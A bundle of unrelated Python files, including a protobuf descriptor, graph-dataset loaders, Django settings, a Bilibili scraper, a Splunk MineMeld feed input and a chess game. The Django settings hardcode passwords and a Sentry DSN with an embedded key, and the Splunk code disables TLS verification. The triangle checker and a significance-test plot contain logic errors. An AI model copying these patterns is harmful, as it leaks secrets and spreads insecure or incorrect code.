containing_service=None,
input_type=_LISTNAMESPACEPERMISSIONUSERSREQUEST,
output_type=_LISTNAMESPACEPERMISSIONUSERSRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
_descriptor.MethodDescriptor(
name='SetNamespacePermission',
full_name='pomerium.dashboard.NamespacePermissionService.SetNamespacePermission',
index=5,
containing_service=None,
input_type=_SETNAMESPACEPERMISSIONREQUEST,
output_type=_SETNAMESPACEPERMISSIONRESPONSE,
serialized_options=None,
create_key=_descriptor._internal_create_key,
),
])
_sym_db.RegisterServiceDescriptor(_NAMESPACEPERMISSIONSERVICE)
DESCRIPTOR.services_by_name['NamespacePermissionService'] = _NAMESPACEPERMISSIONSERVICE
# @@protoc_insertion_point(module_scope)
|
# Given a positive integer n, generate a square matrix filled with elements from 1 to n^2 in spiral order.
# Example:
# Input: 3
# Output:
# [
# [ 1, 2, 3 ],
# [ 8, 9, 4 ],
# [ 7, 6, 5 ]
# ]
class Solution(object):
def generateMatrix(self, n):
"""
:type n: int
:rtype: List[List[int]]
"""
# 模拟 O(n^2)
res = [[0] * n for _ in range(n)]
dx, dy, d = [-1, 0, 1, 0], [0, 1, 0, -1], 0
x, y = 0, 0
for i in range(n*n):
res[x][y] = i+1
nx, ny = x+dx[d], y+dy[d]
if nx < 0 or nx >= n or ny < 0 or ny >= n or res[nx][ny]:
d = (d+1) % 4
nx, ny = x+dx[d], y+dy[d]
x, y = nx, ny
return res |
import torch
import pickle
import torch.utils.data
import time
import os
import numpy as np
import csv
import dgl
from dgl.data import CoraDataset
from dgl.data import CitationGraphDataset
import networkx as nx
import random
from data.ncdata import *
random.seed(42)
def self_loop(g):
"""
Utility function only, to be used only when necessary as per user self_loop flag
: Overwriting the function dgl.transform.add_self_loop() to not miss ndata['feat'] and edata['feat']
This function is called inside a function in CitationGraphsDataset class.
"""
new_g = dgl.DGLGraph()
new_g.add_nodes(g.number_of_nodes())
new_g.ndata['feat'] = g.ndata['feat']
src, dst = g.all_edges(order="eid")
src = dgl.backend.zerocopy_to_numpy(src)
dst = dgl.backend.zerocopy_to_numpy(dst)
non_self_edges_idx = src != dst
nodes = np.arange(g.number_of_nodes())
new_g.add_edges(src[non_self_edges_idx], dst[non_self_edges_idx])
new_g.add_edges(nodes, nodes)
# This new edata is not used since this function gets called only for GCN, GAT
# However, we need this for the generic requirement of ndata and edata
new_g.edata['feat'] = torch.zeros(new_g.number_of_edges())
return new_g
class CitationGraphsDataset(torch.utils.data.Dataset):
def __init__(self, name):
t0 = time.time()
self.name = name.lower()
if self.name == 'cora':
dataset = CoraDataset()
else:
dataset = CitationGraphDataset(self.name)
dataset.graph.remove_edges_from(nx.selfloop_edges(dataset.graph))
graph = dgl.DGLGraph(dataset.graph)
E = graph.number_of_edges()
N = graph.number_of_nodes()
D = dataset.features.shape[1]
graph.ndata['feat'] = torch.Tensor(dataset.features)
graph.edata['feat'] = torch.zeros((E, D))
graph.batch_num_nodes = [N]
self.norm_n = torch.FloatTensor(N,1).fill_(1./float(N)).sqrt()
self.norm_e = torch.FloatTensor(E,1).fill_(1./float(E)).sqrt()
self.graph = graph
self.train_mask = torch.BoolTensor(dataset.train_mask)
self.val_mask = torch.BoolTensor(dataset.val_mask)
self.test_mask = torch.BoolTensor(dataset.test_mask)
self.labels = torch.LongTensor(dataset.labels)
self.num_classes = dataset.num_labels
self.num_dims = D
print("[!] Dataset: ", self.name)
print("Time taken: {:.4f}s".format(time.time()-t0))
def _add_self_loops(self):
# function for adding self loops
# this function will be called only if self_loop flag is True
self.graph = self_loop(self.graph)
norm = torch.pow(self.graph.in_degrees().float().clamp(min=1), -0.5)
shp = norm.shape + (1,) * (self.graph.ndata['feat'].dim() - 1)
self.norm_n = torch.reshape(norm, shp)
class HetDataset(torch.utils.data.Dataset):
def __init__(self, name):
t0 = time.time()
self.name = name.lower()
#dataset.graph.remove_edges_from(nx.selfloop_edges(dataset.graph))
dataset = load_nc_dataset(name)
graph = dgl.DGLGraph()
graph.add_nodes(dataset.graph['node_feat'].shape[0])
graph.add_edges(dataset.graph['edge_index'][0],dataset.graph['edge_index'][1])
graph = dgl.transform.remove_self_loop(graph)
E = graph.number_of_edges()
N = graph.number_of_nodes()
D = dataset.graph['node_feat'].shape[1]
graph.ndata['feat'] = dataset.graph['node_feat']
#graph.edata['feat'] = torch.zeros((E, D))
graph.batch_num_nodes = [N]
self.norm_n = torch.FloatTensor(N, 1).fill_(1. / float(N)).sqrt()
#self.norm_e = torch.FloatTensor(E, 1).fill_(1. / float(E)).sqrt()
self.graph = graph
self.labels = torch.LongTensor(dataset.label).squeeze()
self.num_classes = len(np.unique(dataset.label))
self.num_dims = D
print("[!] Dataset: ", self.name)
print("Time taken: {:.4f}s".format(time.time() - t0))
def _add_self_loops(self):
# function for adding self loops
# this function will be called only if self_loop flag is True
self.graph = self_loop(self.graph)
norm = torch.pow(self.graph.in_degrees().float().clamp(min=1), -0.5)
shp = norm.shape + (1,) * (self.graph.ndata['feat'].dim() - 1)
self.norm_n = torch.reshape(norm, shp) |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Description: Development settings and globals.
"""
__author__ = "Ariel Gerardo Rios (ariel.gerardo.rios@gmail.com)"
from os.path import join, normpath
from base import *
########## DEBUG CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG CONFIGURATION
########## EMAIL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host
EMAIL_HOST = 'smtp.gmail.com'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-password
EMAIL_HOST_PASSWORD = 'password'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-host-user
EMAIL_HOST_USER = 'info@poppurri.com.ar'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-port
EMAIL_PORT = 587
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = '[%s] ' % SITE_NAME
# See: https://docs.djangoproject.com/en/dev/ref/settings/#email-use-tls
EMAIL_USE_TLS = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = EMAIL_HOST_USER
# See: https://docs.djangoproject.com/en/dev/ref/settings/#default-from-email
DEFAULT_FROM_EMAIL = EMAIL_HOST_USER
# See: https://docs.djangoproject.com/en/dev/ref/settings/#send-broken-link-emails
SEND_BROKEN_LINK_EMAILS = True
########## END EMAIL CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'poppurri',
'USER': 'poppurri',
'PASSWORD': 'poppurri',
'HOST': '',
'PORT': '',
}
}
########## END DATABASE CONFIGURATION
########## CACHE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#caches
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
}
}
########## END CACHE CONFIGURATION
########## TOOLBAR CONFIGURATION
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
INSTALLED_APPS += (
'debug_toolbar',
)
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
INTERNAL_IPS = ('127.0.0.1',)
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
MIDDLEWARE_CLASSES += (
'debug_toolbar.middleware.DebugToolbarMiddleware',
)
# See: https://github.com/django-debug-toolbar/django-debug-toolbar#installation
DEBUG_TOOLBAR_CONFIG = {
'INTERCEPT_REDIRECTS': False,
'SHOW_TEMPLATE_CONTEXT': True,
}
########## END TOOLBAR CONFIGURATION
########## MIXTURE CONFIGURATION
MIXTURE_MAX_RATE = 0
########## END MIXTURE CONFIGURATION
########## WEB CONFIGURATION
WEB_CAROUSEL_MIXTURE_COUNT = 10
WEB_CATEGORIES_COUNT = 3
########## END WEB CONFIGURATION
########## sorl-thumbnail CONFIGURATION
THUMBNAIL_DEBUG = DEBUG
########## END sorl-thumbnail CONFIGURATION
########## GOOGLE ANALYTICS CONFIGURATION
USE_GOOGLE_ANALYTICS = False
########## END GOOGLE ANALYTICS CONFIGURATION
########## SENTRY CONFIGURATION
RAVEN_CONFIG = {
'dsn': 'http://4af716fc825041d393a9df0164dc910c:3ffcfa72d4f547a9a1d79a0f8cc18d27@sentry.ariel17.com.ar/7',
}
########## END SENTRY CONFIGURATION
for logger in LOGGING['loggers'].keys():
LOGGING['loggers'][logger]['level'] = 'DEBUG'
LOGGING['loggers'][logger]['handlers'] = ['sentry', 'console']
MEDIA_URL = 'http://localhost:8000/media/'
STATIC_URL = 'http://localhost:8000/static/'
# vim: ai ts=4 sts=4 et sw=4 ft=python
|
from . import stud
from . import cl_info |
print('-='*20)
print('Analisador de Triângulos')
print('-='*20)
a=float(input('Digite o primeiro lado de um triângulo: '))
b=float(input('Digite o segundo lado de um triângulo: '))
c=float(input('Digite o terceiro lado de um triângulo: '))
if a < b + c and b < a + c and c < a + b and a==b==c:
print('O seu triângulo de lados {}, {} e {} pode ser formado e é equilátero!'.format(a,b,c))
elif a < b + c and b < a + c and c < a + b and a==b or a==c or b==c:
print('O seu triângulo de lados {}, {} e {} pode ser formado e é isóceles!'.format(a,b,c))
elif a < b + c and b < a + c and c < a + b and a != b != c != a: #não precisaria colocar o != a porque fiz a linha elif explicando o isóceles
print('O seu triângulo de lados {}, {} e {} pode ser formado e é escaleno!'.format(a,b,c))
else:
print('O seu triângulo não pode ser formado com esses comprimentos.')
#poderia ser if dentro do if também vou criar o ex 42.1 para mostrar |
#!/usr/bin/env python3
import util
db = util.create_database()
root = "https://ss64.com/nt/"
for soup in util.soups_from_files("Documents/*.html"):
for tag in soup.select('.az a[href$=".html"]'):
name = tag.text
path = root + tag.attrs["href"]
util.insert(db, name, path)
|
# Generated by Django 3.0.2 on 2020-01-11 16:51
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('website', '0004_remove_comment_publication'),
]
operations = [
migrations.AddField(
model_name='comment',
name='publication',
field=models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, related_name='comments', to='website.Publication'),
),
]
|
CIFAR_CONFIG = {
# Constants
"device": "cuda",
# Data parameters
"batch_size_train": 100, # E: Bugs want this to be 100 for cifar
"batch_size_test": 200,
"shuffle_train": True,
"image_min": 0,
"image_max": 1,
# Getter functions
"dataset": 'CIFAR10',
"model_name": 'ResNet18', # SimpleModel or AlexNet or VGG or ResNet18
# CURE configurations
"accuracy": 1, # Can be 1, 2, 4, 6, 8
"lambda_0": 0, # Gradient regularizer
"lambda_1": 4, # Original CURE
"lambda_2": 0, # Third order regularizer
"h": [0.1, 0.5, 0.9, 1.3, 1.5], # Length determines minimum nr of epochs
"optimization_algorithm": 'Adam',
"optimizer_arguments": {
'lr': 1e-4
},
"epochs": 10,
"epsilon": 4 / 255,
"use_checkpoint": False,
"checkpoint_file": 'checkpoint_01.data'
}
|
import matplotlib
matplotlib.use('TkAgg') # This is needed for plotting through a CLI call
import matplotlib.pyplot as plt
import pandas as pd
import os
import numpy as np
import itertools
import seaborn as sns
from scipy.stats import ks_2samp
import argparse
import sys
# This function allows violinplots visualization of multiple evaluation models simultaneously and performs a
# Kolmogorov–Smirnov significance test between each combination of models.
# If only one model is selected as input, only the Violinplot will be presented (no test will be superimposed)
# Inputs:
# --listfolders: list of folders that contain the logs - space separated
# --metric: column of "results_eval/evaluation_3Dmetrics.csv" to be used on the plots e.g. dice_class0
# --metadata (optional): 2 elements - (1) column of the participants.tsv metadata so only subjects that belong to that
# category will be used and (2) string to be matched e.g. pathology ms
# Example calls from terminal:
# python3 visualize_and_compare_testing_models.py --listfolders ~/logs/logs_NO_FILM_sctUsers ~/logs/logs_onlyT1w
# or
# python3 visualize_and_compare_testing_models.py --listfolders /home/nas/Desktop/logs/logs_*
# --metric dice_class0 --metadata pathology ms
# Konstantinos Nasiotis 2020
# Dependency: sudo apt-get install python3-tk
# - needed for matplotlib visualization through a CLI call
# ----------------------------------------------------------------------------------------------------------------------#
def main(argv):
# defined command line options
# this also generates --help and error handling
CLI = argparse.ArgumentParser()
CLI.add_argument(
"--listfolders",
nargs="*", # 0 or more values expected => creates a list
type=str,
default=["/home/nas/Desktop/logs/logs_NO_FILM_Karo/", "/home/nas/Desktop/logs/logs_NO_FILM_sctUsers/"], # default if nothing is provided - This should give an error later on
)
CLI.add_argument(
"--metric",
nargs=1,
type=str,
default=["dice_class0"],
)
CLI.add_argument(
"--metadata",
nargs=2,
type=str,
default=[],
)
# parse the command line
args = CLI.parse_args()
args.metric = args.metric[0]
# access CLI options
print("listfolders: %r" % args.listfolders)
print("metric: %r" % args.metric)
if args.metadata != []:
print("metadata: %r" % args.metadata)
# Get the list
logFoldersToCompare = args.listfolders
# Do a quick check that all the required files are present
for folder in logFoldersToCompare:
if not os.path.exists(os.path.join(folder, 'results_eval', 'evaluation_3Dmetrics.csv')):
print('evaluation_3Dmetrics.csv file is not present within ' + os.path.join(folder, 'results_eval'))
raise Exception('evaluation_3Dmetrics.csv missing')
if not os.path.exists(os.path.join(folder, 'participants.tsv')):
print('participants.tsv file is not present within ' + folder)
raise Exception('participants.tsv missing')
if len(logFoldersToCompare) < 1:
raise Exception('No folders were selected - Nothing to show')
columnNames = ["EvaluationModel", args.metric]
df = pd.DataFrame([], columns=columnNames)
for folder in logFoldersToCompare:
result = pd.read_csv(os.path.join(folder, 'results_eval', 'evaluation_3Dmetrics.csv'))
if args.metadata:
participant_metadata = pd.read_table(os.path.join(folder, 'participants.tsv'), encoding="ISO-8859-1")
# Select only the subjects that satisfy the --metadata input
selected_subjects = participant_metadata[participant_metadata[args.metadata[0]] == args.metadata[1]]
# Now select only the scores from these subjects
result_subject_ids = result["image_id"]
result_subject_ids = [i.split('_', 1)[0] for i in result_subject_ids] # Get rid of _T1w, _T2w etc.
result = result[[i for i in range(len(result_subject_ids)) if result_subject_ids[i] in
selected_subjects["participant_id"]]]
if result.empty:
print('No subject meet the selected criteria - skipping plot for: ' + folder)
if not result.empty:
scores = result[args.metric]
folders = [os.path.basename(os.path.normpath(folder))] * len(scores)
combined = np.column_stack((folders, scores.astype(np.object, folders))).T
singleFolderDF = pd.DataFrame(combined, columnNames).T
df = df.append(singleFolderDF, ignore_index=True)
nFolders = len(logFoldersToCompare)
combinedNumbers = list(itertools.combinations(range(nFolders), 2))
combinedFolders = list(itertools.combinations(logFoldersToCompare, 2))
# Pandas annoying issues
df[args.metric] = df[args.metric].astype('float64')
if not df.empty:
# Plot all violinplots
sns.violinplot(x="EvaluationModel", y=args.metric, data=df, color="0.8", inner='quartile')
sns.stripplot(x="EvaluationModel", y=args.metric, data=df, jitter=True, zorder=1)
# Display the mean performance on top of every violinplot
for i in range(len(logFoldersToCompare)):
# This will be used to plot the mean value on top of each individual violinplot
temp = df[args.metric][df['EvaluationModel'] == os.path.basename(os.path.normpath(logFoldersToCompare[i]))]
plt.text(i, df[args.metric].max() + 0.07, str((100 * temp.mean()).round() / 100), ha='center', va='top',
color='r')
if len(logFoldersToCompare) > 1:
# Perform a Kolmogorov–Smirnov test for all combinations of results & connect the corresponding Violinplots
for i in range(len(combinedNumbers)):
dataX = df[args.metric][df['EvaluationModel'] ==
os.path.basename(os.path.normpath(combinedFolders[i][0]))]
dataY = df[args.metric][df['EvaluationModel'] ==
os.path.basename(os.path.normpath(combinedFolders[i][1]))]
KStest = ks_2samp(dataX, dataY)
x1, x2 = combinedNumbers[i]
y, h, col = df['dice_class0'].min() - 0.06 - 0.03 * i, -0.01, 'k'
plt.plot([x1, x1, x2, x2], [y, y + h, y + h, y], lw=1.5, c=col)
# Show if the differentiation of the distributions is :
# Not significant: ns, significant: *, very significant: ***
if KStest.pvalue >= 0.5:
plt.text((x1 + x2) * .5, y + h, "ns", ha='center', va='bottom', color=col)
elif 0.5 > KStest.pvalue >= 0.01:
plt.text((x1 + x2) * .5, y + h, "*", ha='center', va='bottom', color='r')
elif KStest.pvalue < 0.01:
plt.text((x1 + x2) * .5, y + h, "***", ha='center', va='bottom', color='r')
plt.grid()
plt.show()
print('success')
else:
print('No subjects meet the criteria selected for any model. '
'Probably you need to change the --metadata / --metric selection')
if __name__ == "__main__":
main(sys.argv[1:])
|
# -- coding: utf-8 --
import json
import math
import urllib.request
from .lib.gethttp import *
class Upper:
__uid = 0
__caching = {'getUpperVideo': '', 'getUpperNavnum': '', 'getUpperStat': '',
'getUpperRelationstat': '', 'getUpperSpaceTop': '', 'getUpperInfo': ''}
def __init__(self, uid):
self.__uid = uid
def setUid(self, uid):
self.__uid = uid
def getUid(self, uid):
return self.__uid
def getUpperVideo(self, method = 0):
# 获取UP主所有视频
if method == 0 and self.__caching['getUpperVideo'] != '':
return self.__caching['getUpperVideo']
try:
JsonData = getHttpPage("https://api.bilibili.com/x/space/arc/search?mid=" + str(self.__uid) + "&pn=1&ps=1")
DicData = json.loads(JsonData)
UpperPage = math.ceil(int(DicData['data']['page']['count']) / 20)
ReData = {"error": 0}
VideoCount = 0
for iFolderPage in range(1, UpperPage + 1):
JsonData = getHttpPage("https://api.bilibili.com/x/space/arc/search?mid=" + str(self.__uid) + "&pn=" + str(iFolderPage) + "&ps=20")
DicData = json.loads(JsonData)
for DicData_key in DicData['data']['list']['vlist']:
VideoCount = VideoCount + 1
ReData[VideoCount] = DicData_key['aid']
except KeyError:
ReData = {"error": 1}
except:
ReData = {"error": 2}
self.__caching = ReData
return ReData
def getUpperNavnum(self, method = 0):
# 获取UP主作品数量
if method == 0 and self.__caching['getUpperNavnum'] != '':
return self.__caching['getUpperNavnum']
try:
JsonData = getHttpPage("https://api.bilibili.com/x/space/navnum?mid=" + str(self.__uid))
DicData = json.loads(JsonData)
self.__caching['getUpperNavnum'] = {"error": 0,
"video" : DicData['data']['video'],
"audio" : DicData['data']['audio']
}
except KeyError:
self.__caching['getUpperNavnum'] = {"error": 1}
except:
self.__caching['getUpperNavnum'] = {"error": 2}
return self.__caching['getUpperNavnum']
def getUpperStat(self, method = 0):
# 获取UP主作品总数据
if method == 0 and self.__caching['getUpperStat'] != '':
return self.__caching['getUpperStat']
try:
JsonData = getHttpPage("https://api.bilibili.com/x/space/upstat?mid=" + str(self.__uid))
DicData = json.loads(JsonData)
self.__caching['getUpperStat'] = {"error": 0,
"archive" : DicData['data']['archive']['view'],
"article" : DicData['data']['article']['view'],
"likes" : DicData['data']['likes']
}
except KeyError:
self.__caching['getUpperStat'] = {"error": 1}
except:
self.__caching['getUpperStat'] = {"error": 2}
return self.__caching
def getUpperRelationstat(self, method = 0):
# 获取UP主关注人数、粉丝数
if method == 0 and self.__caching['getUpperRelationstat'] != '':
return self.__caching['getUpperRelationstat']
try:
JsonData = getHttpPage("https://api.bilibili.com/x/relation/stat?vmid=" + str(self.__uid))
DicData = json.loads(JsonData)
self.__caching['getUpperRelationstat'] = {"error": 0,
"following" : DicData['data']['following'], # 关注数
"follower" : DicData['data']['follower'] # 粉丝数
}
except KeyError:
self.__caching['getUpperRelationstat'] = {"error": 1}
except:
self.__caching['getUpperRelationstat'] = {"error": 2}
return self.__caching
def getUpperSpaceTop(self, method = 0):
# 获取UP主首页推荐
if method == 0 and self.__caching['getUpperSpaceTop'] != '':
return self.__caching['getUpperSpaceTop']
try:
JsonData = getHttpPage("https://api.bilibili.com/x/space/top/arc?vmid=" + str(self.__uid))
DicData = json.loads(JsonData)
if DicData['message'] == '没有置顶视频':
self.__caching['getUpperSpaceTop'] = {"error": 1}
else:
self.__caching['getUpperSpaceTop'] = {
"error": 0,
"aid": DicData['data']['aid'], # AID
"title": DicData['data']['title'], # 标题
"pic": DicData['data']['pic'], # 封面url
"videos": DicData['data']['videos'], # 分P数
"tid": DicData['data']['tid'], # 分区编号
"tname": DicData['data']['tname'], # 版名
"copyright": DicData['data']['copyright'], # 作品类型
"pubdate": DicData['data']['pubdate'], # 投稿时间
"desc": DicData['data']['desc'], # 简介
"duration": DicData['data']['duration'], # 时常
"reason": DicData['data']['reason'] # 推荐理由
}
except KeyError:
self.__caching['getUpperSpaceTop'] = {"error": 1}
except:
self.__caching['getUpperSpaceTop'] = {"error": 2}
return self.__caching['getUpperSpaceTop']
def getUpperInfo(self, method = 0):
# 获取UP主信息
if method == 0 and self.__caching['getUpperInfo'] != '':
return self.__caching['getUpperInfo']
try:
JsonData = getHttpPage("https://api.bilibili.com/x/space/acc/info?mid=" + str(self.__uid))
DicData = json.loads(JsonData)
ReData = {
"error": 0,
"name" : DicData['data']['name'], # ID
"sex" : DicData['data']['sex'], # 性别
"face" : DicData['data']['face'], # 头像url
"sign" : DicData['data']['sign'], # 个性签名
"level" : DicData['data']['level'], # 等级
"birthday" : DicData['data']['birthday'], # 生日
"official_title" : DicData['data']['official']['title'], # 官方认证信息
"top_photo" : DicData['data']['top_photo'] # 空间横幅url
}
except KeyError:
ReData = {"error": 1}
except:
ReData = {"error": 2}
self.__caching = ReData
return ReData |
# encoding = utf-8
import base64
import functools
import json
import os
import requests.exceptions
import sys
import time
'''
IMPORTANT
Edit only the validate_input and collect_events functions.
Do not edit any other part in this file.
This file is generated only once when creating the modular input.
'''
'''
# For advanced users, if you want to create single instance mod input, uncomment this method.
def use_single_instance_mode():
return True
'''
def timer(desc):
def outer(func):
@functools.wraps(func)
def inner(*args):
"""Decorator to time function execution.
If an exception is raised during the function, then a time of "-1"
will be saved for the given description.
Note: Any function decorated with this should have the "stats" dict
as the final argument in its arg list.
"""
# Setup.
stats = args[-1]
stats[desc] = -1
start = time.time()
# Execute the function.
ret_val = func(*args)
# No exception, so save the runtime and return ret_val.
stats[desc] = time.time() - start
return ret_val
return inner
return outer
def validate_input(helper, definition):
"""Implement your own validation logic to validate the input stanza configurations"""
# This example accesses the modular input variable
# feed_url = definition.parameters.get('feed_url', None)
# credentials = definition.parameters.get('credentials', None)
pass
def collect_events(helper, ew):
"""Collect the kvstore events from the feed."""
# Get the short name for this feed.
name = helper.get_input_stanza_names()
stats = {'input_name': name}
helper.log_info('START Splunk_TA_paloalto indicator retrieval for "{0}"'.format(
name))
# Delete kvstore events with this source.
delete_from_kvstore(helper, name, stats)
# Retrieve current entries from the MineMeld feed.
entries = []
try:
entries = get_feed_entries(helper, name, stats)
except requests.exceptions.HTTPError as e:
helper.log_error('Failed to get entries for "{0}": {1}'.format(
name, e))
stats['indicators'] = len(entries)
# Save the current entries to the kvstore.
save_to_kvstore(helper, name, entries, stats)
# Write an event to the index giving some basic stats.
save_stats_as_event(helper, ew, stats)
# Done
helper.log_info('END Splunk_TA_paloalto indicator retrieval for "{0}"'.format(
name))
@timer('clear_kvstore')
def delete_from_kvstore(helper, name, stats):
"""Deletes all kvstore entries for splunk_source `name`."""
resp = helper.send_http_request(
url=_uri(helper),
headers=_headers(helper),
method='GET',
verify=False,
parameters={'query': json.dumps({'splunk_source': name})})
cur_info = resp.json()
helper.log_info('Removing {0} previous entries for MineMeld feed "{1}"'.format(
len(cur_info), name))
resp = helper.send_http_request(
url=_uri(helper),
headers=_headers(helper),
method='DELETE',
verify=False,
parameters={'query': json.dumps({'splunk_source': name})})
resp.raise_for_status()
@timer('retrieve_indicators')
def get_feed_entries(helper, name, stats):
"""Pulls the indicators from the minemeld feed."""
feed_url = helper.get_arg('feed_url')
feed_creds = helper.get_arg('credentials')
feed_headers = {}
# If auth is specified, add it as a header.
if feed_creds is not None:
auth = '{0}:{1}'.format(feed_creds['username'], feed_creds['password'])
auth = base64.encodestring(auth).replace('\n', '')
feed_headers['Authorization'] = 'Basic {0}'.format(auth)
# Pull events as json.
resp = helper.send_http_request(
url=feed_url,
method='GET',
parameters={'v': 'json', 'tr': 1},
headers=feed_headers)
# Raise exceptions on problems.
resp.raise_for_status()
feed_entries = resp.json()
# Return the normalized events to be saved to the kv store.
return normalized(name, feed_entries)
@timer('save_to_kvstore')
def save_to_kvstore(helper, name, entries, stats):
"""Saves all normalized entries as `name` events."""
helper.log_info('Saving {0} entries for MineMeld feed "{1}"'.format(
len(entries), name))
url = '{0}/batch_save'.format(_uri(helper))
# We need to batch in groups of 500, the default.
for i in range(0, len(entries), 500):
resp = helper.send_http_request(
url=url,
headers=_headers(helper),
method='POST',
verify=False,
payload=entries[i:i+500])
resp.raise_for_status()
def save_stats_as_event(helper, ew, stats):
"""Saves the stats of getting feed events to the index."""
event = helper.new_event(
source=helper.get_input_type(),
index=helper.get_output_index(),
sourcetype=helper.get_sourcetype(),
data=json.dumps(stats),
)
ew.write_event(event)
def _uri(helper):
"""Returns the URL of the kvstore."""
return '/'.join((
helper.context_meta['server_uri'],
'servicesNS',
'nobody',
'Splunk_TA_paloalto',
'storage',
'collections',
'data',
'minemeldfeeds'))
def _headers(helper):
"""Returns the auth header for Splunk."""
return {
'Authorization': 'Splunk {0}'.format(
helper.context_meta['session_key'])}
def normalized(name, feed_entries):
"""Returns a list of normalized kvstore entries."""
data = []
for feed_entry in feed_entries:
if 'indicator' not in feed_entry or 'value' not in feed_entry:
continue
# Make the entry dict.
entry = feed_entry.copy()
entry['splunk_source'] = name
data.append(entry)
return data
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-10-28 15:07
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ecom_webapp', '0005_auto_20171028_1504'),
]
operations = [
migrations.AlterField(
model_name='mobiles',
name='secondary_camera',
field=models.CharField(blank=True, max_length=20, null=True),
),
]
|
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from backend.config import DATABASE_URI
engine = create_engine(DATABASE_URI, convert_unicode=True, echo=True)
db_session = scoped_session(
sessionmaker(autocommit=False, autoflush=False, bind=engine)
)
Base = declarative_base()
Base.query = db_session.query_property()
def init_db():
Base.metadata.create_all(engine)
|
# -*- coding: utf-8 -*-
import unittest
from .fixtures import (
fixture_data,
Chain,
SharedInstance,
shared_blockchain_instance,
set_shared_blockchain_instance,
set_shared_config,
)
class Testcases(unittest.TestCase):
def setUp(self):
fixture_data()
def test_shared_instance(self):
self.assertFalse(SharedInstance.instance)
c = Chain()
set_shared_blockchain_instance(c)
self.assertEqual(id(c), id(SharedInstance.instance))
c2 = Chain()
set_shared_blockchain_instance(c2)
self.assertEqual(id(c2), id(SharedInstance.instance))
def test_shared_config(self):
self.assertFalse(SharedInstance.config)
c = Chain()
set_shared_config(dict(nobroadcast=True))
self.assertTrue(SharedInstance.config.get("nobroadcast", False))
set_shared_blockchain_instance(c)
set_shared_config(dict(nobroadcast=False))
self.assertFalse(SharedInstance.config.get("nobroadcast", True))
|
import pygame
pygame.init()
import json
from datetime import datetime
from random import randrange
import math
from board import board
import sys
from pathlib import Path
sys.path.append(str(Path(__file__).parent) + '/players_script')
from ai import ai
from human import human
sys.path.append(str(Path(__file__).parent) + '/DAO_script')
from game_history_DAO import game_history_DAO
class chess_game():
def __init__(self):
self.width, self.height = 1200, 700
self.window = pygame.display.set_mode((self.width, self.height))
self.screen = pygame.Surface(self.window.get_size())
self.screen = self.screen.convert()
self.fps = 5
self.gray = (125, 125, 125)
self.black = (0, 0, 0)
self.light_black = (50, 50, 50)
self.white = (255, 255, 255)
self.beige = (204, 174, 92)
self.orange = (176, 106, 26)
self.green = (0, 130, 0)
self.red = (130, 0, 0)
self.is_menu = True
self.is_game = False
self.is_history = False
self.select_color = False
self.history_button_positions = []
self.game_button_positions = []
self.game_buttons_init = True
self.menu_button_positions = []
self.color_buttons_init = True
self.game_mode_buttons_init = True
self.mouse = None
self.selected_color = None
self.path = str(Path(__file__).parent) + '/assets/'
self.white_bottom_column_values = {0: "A", 1: "B", 2: "C", 3: "D", 4: "E", 5: "F", 6: "G", 7: "H"}
self.white_bottom_row_values = {0: "8", 1: "7", 2: "6", 3: "5", 4: "4", 5: "3", 6: "2", 7: "1"}
self.black_bottom_column_values = {0: "H", 1: "G", 2: "F", 3: "E", 4: "D", 5: "C", 6: "B", 7: "A"}
self.black_bottom_row_values = {0: "1", 1: "2", 2: "3", 3: "4", 4: "5", 5: "6", 6: "7", 7: "8"}
self.are_players_initialized = False
self.player_turn = None
self.game_started = False
self.starting_pos_left = 50
self.starting_pos_top = 50
self.starting_row = None
self.starting_column = None
self.game_mode = None
self.game_saved = False
self.viewing_current_move = True
self.viewing_game_in_db = False
self.current_game_in_bd_viewed = None
self.viewing_index = 0
self.game_history_DAO = game_history_DAO()
self.list_games = []
self.pawn_upgrade_chosen = None
self.played_row = None
self.played_column = None
def main(self):
is_running = True
clock = pygame.time.Clock()
wait_time = 0
while is_running: # closes the window if checkmate
clock.tick(self.fps)
for event in pygame.event.get():
if event.type == pygame.QUIT:
is_running = False
if event.type == pygame.MOUSEBUTTONDOWN:
self.mouse = pygame.mouse.get_pos()
if self.is_menu:
wait_time = 0
self.show_menu()
if self.mouse != None:
for button in self.menu_button_positions: # button: [texte, left, top, width, height]
if self.mouse[0] >= button[1] and self.mouse[0] <= button[1] + button[3] and self.mouse[1] >= button[2] and self.mouse[1] <= button[2] + button[4]:
#click on button
if button[0] == "Play vs Human" or button[0] == "Play vs AI":
self.viewing_current_move = True
self.select_color = True
if button[0] == "Play vs Human":
self.game_mode = "Human"
else:
self.game_mode = "AI"
elif button[0] == "White":
self.selected_color = "white"
self.is_menu = False
self.is_game = True
self.viewing_game_in_db = False
self.current_game_in_bd_viewed = None
elif button[0] == "Random":
random = randrange(10)
